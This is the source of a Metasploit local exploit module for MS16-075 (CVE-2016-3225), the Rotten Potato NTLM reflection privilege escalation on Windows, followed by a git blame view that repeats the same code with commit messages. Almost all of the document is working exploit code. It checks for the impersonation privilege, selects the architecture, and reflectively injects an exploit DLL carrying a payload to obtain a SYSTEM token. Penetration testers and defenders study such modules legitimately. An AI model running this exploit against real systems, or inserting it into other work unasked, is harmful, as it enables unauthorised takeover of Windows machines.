modules/exploits/windows/local/ms16_075_reflection.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',
          'Description' => %q{
            Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
            to achieve a SYSTEM handle for elevation of privilege. Currently the module
            does not spawn as SYSTEM, however once achieving a shell, one can easily
            use incognito to impersonate the token.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'FoxGloveSec', # the original Potato exploit
            'breenmachine', # Rotten Potato NG!
            'Mumbai' # Austin : port of RottenPotato for reflection & quick module
          ],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'DefaultOptions' => {
            'EXITFUNC' => 'none',
            'WfsDelay' => '20'
          },
          'Targets' => [
            ['Automatic', {}],
            ['Windows x86', { 'Arch' => ARCH_X86 }],
            ['Windows x64', { 'Arch' => ARCH_X64 }]
          ],
          'Payload' => {
            'DisableNops' => true
          },
          'References' => [
            ['MSB', 'MS16-075'],
            ['CVE', '2016-3225'],
            ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
            ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
            ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
          ],
          'DisclosureDate' => '2016-01-16',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_sys_config_getprivs
              ]
            }
          }
        }
      )
    )
  end

  def assign_target
    if target.name == 'Automatic'
      case sysinfo["Architecture"]
      when 'x86'
        vprint_status("Found we are on an x86 target")
        my_target = targets[1]
      when 'x64'
        vprint_status("Found we are on an x64 target")
        my_target = targets[2]
      else
        fail_with(Failure::NoTarget, "Unable to determine target")
      end
    else
      my_target = target
    end
    return my_target
  end

  def verify_arch(my_target)
    if my_target["Arch"] != sysinfo["Architecture"]
      print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
      print_error("Actual Target Arch = #{sysinfo['Architecture']}")
      fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
    end
    if client.arch != sysinfo["Architecture"]
      fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
    else
      vprint_good("Current payload and target Arch match....")
    end
  end

  def check
    privs = client.sys.config.getprivs
    if privs.include?('SeImpersonatePrivilege')
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
    my_target = assign_target
    print_status("#{my_target['Arch']}")
    verify_arch(my_target)
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')
    end
    if my_target.opts['Arch'] == 'x64'
      dll_file_name = 'rottenpotato.x64.dll'
      vprint_status("Assigning payload rottenpotato.x64.dll")
    elsif my_target.opts['Arch'] == 'x86'
      dll_file_name = 'rottenpotato.x86.dll'
      vprint_status("Assigning payload rottenpotato.x86.dll")
    else
      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
    end

    print_status("Reflectively injecting the exploit DLL and triggering the exploit...")

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name),
      encoded_payload
    )

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end
adding reflective Potato 2018-08-03 02:09:24 -04:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Local`
			`Rank = NormalRanking`

			`include Msf::Post::File`
			`include Msf::Post::Windows::Priv`
			`include Msf::Post::Windows::Process`
			`include Msf::Post::Windows::FileInfo`
			`include Msf::Post::Windows::ReflectiveDLLInjection`

Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`{`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',`
			`'Description' => %q{`
			`Module utilizes the Net-NTLMv2 reflection between DCOM/RPC`
			`to achieve a SYSTEM handle for elevation of privilege. Currently the module`
			`does not spawn as SYSTEM, however once achieving a shell, one can easily`
			`use incognito to impersonate the token.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'FoxGloveSec', # the original Potato exploit`
			`'breenmachine', # Rotten Potato NG!`
			`'Mumbai' # Austin : port of RottenPotato for reflection & quick module`
			`],`
			`'Arch' => [ARCH_X86, ARCH_X64],`
			`'Platform' => 'win',`
			`'SessionTypes' => ['meterpreter'],`
			`'DefaultOptions' => {`
			`'EXITFUNC' => 'none',`
			`'WfsDelay' => '20'`
			`},`
			`'Targets' => [`
			`['Automatic', {}],`
			`['Windows x86', { 'Arch' => ARCH_X86 }],`
			`['Windows x64', { 'Arch' => ARCH_X64 }]`
			`],`
			`'Payload' => {`
			`'DisableNops' => true`
			`},`
			`'References' => [`
			`['MSB', 'MS16-075'],`
			`['CVE', '2016-3225'],`
			`['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],`
			`['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],`
			`['URL', 'https://github.com/breenmachine/RottenPotatoNG']`
			`],`
			`'DisclosureDate' => '2016-01-16',`
Specify meterpreter compatibility command requirements 2021-09-08 21:56:02 +01:00			`'DefaultTarget' => 0,`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`stdapi_sys_config_getprivs`
			`]`
			`}`
			`}`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`}`
			`)`
			`)`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`end`

shut up, rubocop 2018-10-02 14:40:55 -05:00			`def assign_target`
code cleanup 2018-10-02 14:06:25 -05:00			`if target.name == 'Automatic'`
			`case sysinfo["Architecture"]`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`when 'x86'`
			`vprint_status("Found we are on an x86 target")`
			`my_target = targets[1]`
			`when 'x64'`
			`vprint_status("Found we are on an x64 target")`
			`my_target = targets[2]`
			`else`
			`fail_with(Failure::NoTarget, "Unable to determine target")`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`end`
code cleanup 2018-10-02 14:06:25 -05:00			`else`
			`my_target = target`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`end`
code cleanup 2018-10-02 14:06:25 -05:00			`return my_target`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`end`
Make msftidy happy 2018-09-18 19:57:04 -05:00
code cleanup 2018-10-02 14:06:25 -05:00			`def verify_arch(my_target)`
			`if my_target["Arch"] != sysinfo["Architecture"]`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`print_error("Assigned Target Arch = #{my_target.opts['Arch']}")`
			`print_error("Actual Target Arch = #{sysinfo['Architecture']}")`
code cleanup 2018-10-02 14:06:25 -05:00			`fail_with(Failure::BadConfig, "Assigned Arch does not match reality")`
			`end`
			`if client.arch != sysinfo["Architecture"]`
			`fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")`
			`else`
			`vprint_good("Current payload and target Arch match....")`
			`end`
			`end`
shut up, rubocop 2018-10-02 14:40:55 -05:00
Add check for SeImpersonatePrivilege 2018-08-23 16:54:22 -04:00			`def check`
			`privs = client.sys.config.getprivs`
			`if privs.include?('SeImpersonatePrivilege')`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`return Exploit::CheckCode::Appears`
Add check for SeImpersonatePrivilege 2018-08-23 16:54:22 -04:00			`end`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00
Add check for SeImpersonatePrivilege 2018-08-23 16:54:22 -04:00			`return Exploit::CheckCode::Safe`
			`end`
adding reflective Potato 2018-08-03 02:09:24 -04:00
			`def exploit`
			`if is_system?`
			`fail_with(Failure::None, 'Session is already elevated')`
			`end`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`my_target = assign_target`
			`print_status("#{my_target['Arch']}")`
code cleanup 2018-10-02 14:06:25 -05:00			`verify_arch(my_target)`
Fixed check to you know, check. 2018-10-04 16:38:35 -05:00			`if check == Exploit::CheckCode::Safe`
			`fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')`
			`end`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`if my_target.opts['Arch'] == 'x64'`
code cleanup 2018-10-02 14:06:25 -05:00			`dll_file_name = 'rottenpotato.x64.dll'`
			`vprint_status("Assigning payload rottenpotato.x64.dll")`
shut up, rubocop 2018-10-02 14:40:55 -05:00			`elsif my_target.opts['Arch'] == 'x86'`
code cleanup 2018-10-02 14:06:25 -05:00			`dll_file_name = 'rottenpotato.x86.dll'`
			`vprint_status("Assigning payload rottenpotato.x86.dll")`
			`else`
			`fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")`
adding reflective Potato 2018-08-03 02:09:24 -04:00			`end`
Improve the list of potential processes to spawn and inject into to be more believable 2021-07-01 11:58:13 -05:00
			`print_status("Reflectively injecting the exploit DLL and triggering the exploit...")`

adding reflective Potato 2018-08-03 02:09:24 -04:00			`# invoke the exploit, passing in the address of the payload that`
			`# we want invoked on successful exploitation.`
Improve the list of potential processes to spawn and inject into to be more believable 2021-07-01 11:58:13 -05:00			`encoded_payload = payload.encoded`
			`execute_dll(`
			`::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name),`
Fix up Spencer's comments from review to correctly pass in parameters to execute_dll() as some calls were passing the wrong set of parameters 2021-07-21 12:35:47 -05:00			`encoded_payload`
Improve the list of potential processes to spawn and inject into to be more believable 2021-07-01 11:58:13 -05:00			`)`

adding reflective Potato 2018-08-03 02:09:24 -04:00			`print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')`
			`end`
			`end`